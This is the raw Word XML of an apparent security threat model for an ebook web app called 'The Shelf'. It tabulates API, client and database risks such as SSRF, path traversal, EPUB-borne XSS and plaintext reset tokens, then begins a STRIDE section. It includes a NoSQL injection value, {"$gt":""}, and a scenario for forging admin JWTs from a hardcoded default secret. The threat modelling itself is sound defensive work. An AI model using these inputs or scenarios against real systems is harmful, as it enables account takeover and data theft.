              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C1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E31899">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Timing oracle on token comparison; reset tokens stored in plaintext in DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F7E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B2C59E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/books</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32A89">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET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907CAB">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8AFB7E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C1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E6945A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unauthenticated access exposes all book metadata including internal file paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1570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45BDFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/books/epub-proxy/:id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4535F7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET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F96BC3">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3781A9C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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0F679">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF — fetches book.epubUrl with no allowlist; can reach internal network/cloud metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3EF6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1AC5B8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/books/epub-upload/:fn</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F017C5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET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429899">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</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529979DC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C1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C57224">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Path traversal via URL-encoded sequences; guard uses string comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47D1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DF9881">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/admin/books/scrape</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35AA65">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051550">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT+Admin</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00C127E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C1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ACE7D4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stores external URLs as epubUrl; DNS rebinding or compromised mirror injects SSRF payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D1F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84AD58">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/admin/books/upload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608DDE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>POST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68EA0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT+Admin</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769F5A43">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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F53DD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Malicious EPUB upload → stored XSS via allowScriptedContent: true in epub.js renderer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7361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DB637">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/admin/books/:id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CDA05F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUT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E948C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT+Admin</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E2A90F3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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EB3099">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mass assignment — req.body passed directly to findByIdAndUpdate with no field allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2243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DFDE0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/progress/:bookId</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7A2756">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUT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03CFA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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123C98E1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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1F5C6B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CFI injection in last_location field; no sanitization on stored string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23CFDEC6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612D2DEE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FBE93B2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3.2 Client-Side Attack Surface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360"/>
      </w:tblGrid>
      <w:tr w14:paraId="5041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16DCDAEC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Component</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394AD853">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="53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2C4F1804">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="388F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B8DF57">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>epub.js renderTo() with allowScriptedContent: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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713CB3F0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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AC6CF4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Any &lt;script&gt; in EPUB HTML executes in browser context. Can read localStorage JWT and exfiltrate to attacker server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1476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FE0AD3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>localStorage JWT storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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2454E37">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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839E67">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Token accessible to any JavaScript in the SPA origin. XSS anywhere = full account takeover. No revocation mechanism.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11D7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3E0CCB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Gutenberg metadata rendering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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44F257DC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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2CF61">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>React JSX escapes by default. Risk only if dangerouslySetInnerHTML is introduced in future.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="32ED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B7CF52">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cover image URLs from DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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20EA20D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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3F4F45">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tampered DB entry could point cover &lt;img src&gt; to attacker server, leaking user IP/fingerprint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69807004">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3.3 Database Attack Surface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360"/>
      </w:tblGrid>
      <w:tr w14:paraId="1BBE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73DA2DF6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Data Element</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00FD2884">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="53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7C1A90ED">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5347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997666">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User.findOne({ email }) on login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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41923F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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9BADE7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NoSQL injection: if email is {"$gt":""}, returns first user. Mongoose type-casting provides partial protection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A48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72C279">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>resetToken field (users collection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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59764FDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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FD80EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored in plaintext. DB exfiltration exposes all active reset tokens immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1350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DBEB7F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>epubUrl field (books collection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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0DAEE3A8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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BB3E50">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stores internal server file paths. Exfiltration reveals full directory structure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C83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78A9B4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ReadingProgress composite key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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7566E3A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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2DF935">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No unique index on {userId, bookId}. Race condition can create duplicate progress records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73645E33">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A33B7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4. STRIDE Threat Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A4FE1">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>STRIDE is applied per-element against The Shelf's architecture. Each threat includes a realistic attack scenario, affected components, and estimated CVSS v3.1 score.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8F21D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.1 S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spoofing: JWT Secret Compromise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F6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7A97DC">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B94697">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="02B5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8E803">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A7D670">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="66C1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D0A358">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B7DAD9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>verifyToken middleware, all authenticated routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="287A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322C1D">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D69AF6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT_SECRET defaults to the hardcoded string "your-secret-key" if .env.local is absent. An attacker reads the public GitHub repo, discovers the fallback value, and forges a JWT for any user ID (including admin) using jwt.io. The forged token passes jwt.verify() and grants full admin access to EPUB upload, book deletion, and user data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1B7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721FBB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitability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20BA6F">
            <w:r>
              <w:rPr>
